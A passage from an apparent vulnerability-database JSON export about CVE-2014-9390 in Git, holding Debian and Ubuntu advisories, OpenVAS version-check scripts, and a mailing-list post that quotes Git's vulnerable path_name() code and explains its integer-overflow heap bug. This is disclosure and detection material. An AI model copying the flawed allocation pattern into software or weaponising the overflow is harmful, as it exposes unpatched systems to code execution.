"https://vulners.com/securityvulns/SECURITYVULNS:DOC:31505", "title": "APPLE-SA-2014-12-18-1 Xcode 6.2 beta 3", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-9390"], "description": "Invali processing of characters case in special files names.", "edition": 1, "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:VULN:14154", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14154", "title": "Apple Xcode git client unauthorized files access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3257-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMay 11, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mercurial\r\nCVE ID : CVE-2014-9462\r\nDebian Bug : 783237\r\n\r\nJesse Hertz of Matasano Security discovered that Mercurial, a\r\ndistributed version control system, is prone to a command injection\r\nvulnerability via a crafted repository name in a clone command.\r\n\r\nFor the oldstable distribution &#40;wheezy&#41;, this problem has been fixed in\r\nversion 2.2.2-4+deb7u1. This update also includes a fix for\r\nCVE-2014-9390 previously scheduled for the next wheezy point release.\r\n\r\nFor the stable distribution &#40;jessie&#41;, this problem has been fixed in\r\nversion 3.1.2-2+deb8u1.\r\n\r\nFor the unstable distribution &#40;sid&#41;, this problem has been fixed in\r\nversion 3.4-1.\r\n\r\nWe recommend that you upgrade your mercurial packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJVUQtdAAoJEAVMuPMTQ89EQDcP/2qNgRl1fhhTTuzQUpTSutuF\r\n8tauTnYT3xuu3PB6aXDWEqFTmmKxUQQiOyVxTWeqeF7jWs7Wu0naTBrs+tKvC4b2\r\nlxy8AC5asTNmPdxUeJMqsUonHvkFEBqGQnomhOwb/qB2oEMgO3vGCrrEs7IFGZ9r\r\nZ+yi91ZbnzMXrH1t2cAGYRmilhquhLg0OEp4hjFhiEZor9GS+Ejdb+g2r/Ug5YFx\r\nbQUsMwJ8ww5r8WjFkTybwAT9iORR2uD6QyyzT11w/F9nXmCZEcurCN+xJKtkyTLW\r\n7ImSrFuhcUbCYSSf9JYiY69SeojBXFkGD8maxjZG8avqzEiKqmxIODUVEn4qO5HD\r\nbSBS/aG6oHD9Sw4pGAtrR2WlOucPf4UOnBxB2ztYrLgMrSE9uMBdceMK8ts2hIrP\r\ne8AojdicvaJZ2q0BBWCo8BSsWpwwN4bgDnWj3d6r63cWWQM/6b6ZSA2NlQsAs0V1\r\noIVCpiUWZImc8I6GKpp3cQM69ECIIgH2+tr7gimsUlTzObP3heGqEqjrA60KAAdl\r\npe6vZClklSyhF1lOqW/p2SSLDcNWZ/ht/0bP223an1yXzwbVi8t/qRXGfggHi+cr\r\nQXEhw2LSRBhQ+894iznWPXHmBdYqKu+hC/yMD+D0B5W64PSRtDxjfMoJi562pNWZ\r\nzifFdMx9P3uOVEHG+d+V\r\n=jXXY\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32120", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32120", "title": "[SECURITY] [DSA 3257-1] mercurial security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "Matt Mackall and Augie Fackler discovered that Git incorrectly handled certain \nfilesystem paths. A remote attacker could possibly use this issue to execute \narbitrary code if the Git tree is stored in an HFS+ or NTFS filesystem. The \nremote attacker would need write access to a Git repository that the victim \npulls from.", "edition": 4, "modified": "2015-01-14T00:00:00", "published": "2015-01-14T00:00:00", "href": "https://ubuntu.com/security/notices/USN-2470-1", "id": "USN-2470-1", "type": "ubuntu", "title": "Git vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:14:42", "description": "\u53c2\u8003\u6765\u6e90\uff1a http://seclists.org/oss-sec/2016/q1/645\r\n\r\nHello, original report describing the overflow is here http://pastebin.com/UX2P2jjg\r\n\r\n\r\n>On 11/02/2016 16:50, Jeff King wrote this on the git security mailing list:\r\n\r\n>>On Thu, Feb 11, 2016 at 02:31:49PM +0100, 'La\u00ebl Cellier' via Git Security wrote:\r\nOk the bug works by pushing or cloning a repository with a large\r\nfilename or a large number of nested trees.\r\n[...]\r\nThe point is affected versions are still shipped as part of many\r\ndistributions as part of their stable branch, so I think it\u2019s\r\nimportant to get a \u1d04\u1d20\u1d07 for public awareness.\r\n\r\n>Yes, I do think versions below v2.7.0 have a heap overflow, as you\r\nmentioned. But I don't think that is the only problem with path_name(),\r\neven in the current version.\r\n\r\n> I'll repeat the code here (the version you posted was indented badly,\r\nand I had trouble reading it):\r\n\r\n```\r\n-- >8 --\r\nchar *path_name(const struct name_path *path, const char *name)\r\n{\r\n const struct name_path *p;\r\n char *n, *m;\r\n int nlen = strlen(name);\r\n int len = nlen + 1;\r\n\r\n for (p = path; p; p = p->up) {\r\n if (p->elem_len)\r\n len += p->elem_len + 1;\r\n }\r\n n = xmalloc(len);\r\n m = n + len - (nlen + 1);\r\n memcpy(m, name, nlen + 1);\r\n for (p = path; p; p = p->up) {\r\n if (p->elem_len) {\r\n m -= p->elem_len + 1;\r\n memcpy(m, p->elem, p->elem_len);\r\n m[p->elem_len] = '/';\r\n }\r\n }\r\n return n;\r\n}\r\n-- 8< --\r\n```\r\n> The problem you describe is one where the size of the allocation does\r\nnot match what strcpy would write. And that's kind-of fixed by moving to\r\nmemcpy() in 34fa79a6, because at least now the initial value of \"len\"\r\nmatches the number of bytes we write (so that number might be totally\r\nbogus, but we don't write more than we allocate).\r\n\r\n> But \"len\" can also change after the fact, due to the loop. If you have a\r\nsequence of path components, each less than 2^31, they can sum to a much\r\nsmaller positive value due to integer overflow (e.g., A/B/C with lengths\r\nA=2^31-5, B=2^31-5, C=20 would yield len=10). Then the buffer is too\r\nsmall to fit C, let alone all of the extra components we insert in the\r\nsecond loop.\r\n\r\n> The fix I came up with for this is to convert all of the \"int\" variables\r\nhere to \"size_t\". That doesn't actually _fix_ the problem at all, but\r\ndoes mean on a 64-bit system that you need a 2^64-long path to trigger\r\nit, which is impractical. But that doesn't help 32-bit systems (though\r\nin practice, I wouldn't be surprised if we barf long before that, as we\r\nwould be unable to hold the \"struct name_path\" list in memory).\r\n\r\n> Note that there is also a similar problem in tree-diff.c's\r\npath_appendnew(). There we build up the full pathname in a strbuf,\r\nwhich checks for overflow. But we then pass that length as an int and\r\nallocate a FLEX_ARRAY struct with it, which can end up too-small. This\r\none is the more interesting of the two, I think, as it triggers via\r\ngit-log, whereas the path_name() happens only during a repack (so it\r\nwill hit you _eventually_, but probably not as soon as you've cloned).\r\n\r\n> My solution there was similar: use size_t, which at least means you'd\r\nhave to allocate petabytes on a 64-bit system to trigger it (much less\r\non a 32-bit system, but _probably_ you'd be saved by malloc failing\r\nfirst).\r\n\r\n> And that's why I dragged my feet on sending those fixes upstream; I\r\ndon't think they're complete. The complete fix would be to use size_t\r\nconsistently to store return values for strlen(), and to do integer\r\noverflow checks whenever we do computations on size_t.\r\n\r\n> Those of you on this list may recall I posted a series for the latter\r\nlast year, but it was somewhat invasive. It may be worth resurrecting.\r\n\r\n> I think we could also get rid of path_name() entirely. The sole purpose\r\nat this point is to compute the name-hash for pack-objects, which could\r\nbe done by walking the name_path list rather than re-constructing the\r\nwhole thing in memory.\r\n\r\n> -Peff\r\n\r\nOf course everything Peff talked about above is now fixed in git 2.7.1 with the removal of path_name() and the size_t/overflow check in tree-diff.c. It was even fixed earlier for users of github enterprise. However, several months after the last message on this thread, I\u2019m not aware of any Linux distribution that issued a fix for their stable branch. Last week I could contact wikimedia so they could fix their gerrit\u2011gc server. Bitbucket, GitLab still suffer from that issue (they even use a git version before git/commit/34fa79a6cde56d6d428ab0d3160cb094ebad3305 which is the easiest one to trigger because of strcpy() instead of memcpy() ). while it seems normal the \u1d04\u1d20\u1d07 details are still unpublished, I definitely can\u2019t deal with every major provider.\r\n\r\nPeople surely remember https://www.google.fr/search?tbm=nws&q=cve-2014-9390 breaking the news about a similar issue in that software (which allowed most distros to fix it quikcly). It seems while this threat is more widespread, it definitely lacks advertisement.\r\nSo some Peoples suggested me to post about it here.", "published": "2016-03-16T00:00:00", "type": "seebug", "title": "Git \u7248\u672c<=2.7.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2016-03-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91042", "id": "SSV:91042", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-03-02T20:53:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868647", "type": "openvas", "title": "Fedora Update for eclipse-jgit FEDORA-2014-17341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for eclipse-jgit FEDORA-2014-17341\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868647\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:38:42 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for eclipse-jgit FEDORA-2014-17341\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'eclipse-jgit'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"eclipse-jgit on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147193.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"eclipse-jgit\", rpm:\"eclipse-jgit~3.5.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:51:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "Gentoo Linux Local Security Checks GLSA 201509-06", "modified": "2020-02-28T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121412", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201509-06", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (C) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121412\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:29:03 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"Gentoo Security Advisory GLSA 201509-06\");\n script_tag(name:\"insight\", value:\"A vulnerability in Git causing Git-compatible clients that access case-insensitive or case-normalizing filesystems to overwrite the .git/config when cloning or checking out a repository, leading to execution of arbitrary commands.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201509-06\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201509-06\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 1.8.5.6\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 1.9.5\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 2.0.5\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(), vulnerable: make_list(\"lt 2.0.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:53:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "Mageia Linux Local Security Checks mgasa-2015-0325", "modified": "2020-02-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130059", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130059", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (C) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130059\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:10 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0325\");\n script_tag(name:\"insight\", value:\"cgit in Mageia 4/5 bundles an old git that is being subject to a minor security issue (CVE-2014-9390). The cgit package was updated to its latest upstream release, and updates the bundled git to the non-vulnerable version 2.5.0, which contains various bug fixes.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0325.html\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0325\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"cgit\", rpm:\"cgit~0.11.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:52:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868829", "type": "openvas", "title": "Fedora Update for eclipse-egit FEDORA-2014-17341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for eclipse-egit FEDORA-2014-17341\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868829\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:56:55 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for eclipse-egit FEDORA-2014-17341\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'eclipse-egit'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"eclipse-egit on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147192.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"eclipse-egit\", rpm:\"eclipse-egit~3.5.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:51:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-23T00:00:00", "id": "OPENVAS:1361412562310842045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842045", "type": "openvas", "title": "Ubuntu Update for git USN-2470-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for git USN-2470-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842045\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:58:04 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for git USN-2470-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Matt Mackall and Augie Fackler discovered that\nGit incorrectly handled certain filesystem paths. A remote attacker could possibly\nuse this issue to execute arbitrary code if the Git tree is stored in an HFS+ or NTFS\nfilesystem. The remote attacker would need write access to a Git repository that the\nvictim pulls from.\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2470-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2470-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.1.0-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.7.9.5-1ubuntu0.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.", "modified": "2017-07-07T00:00:00", "published": "2015-05-11T00:00:00", "id": "OPENVAS:703257", "href": "http://plugins.openvas.org/nasl.php?oid=703257", "type": "openvas", "title": "Debian Security Advisory DSA 3257-1 (mercurial - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3257.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3257-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703257);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2014-9390\", \"CVE-2014-9462\");\n script_name(\"Debian Security Advisory DSA 3257-1 (mercurial - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-05-11 00:00:00 +0200 (Mon, 11 May 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3257.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 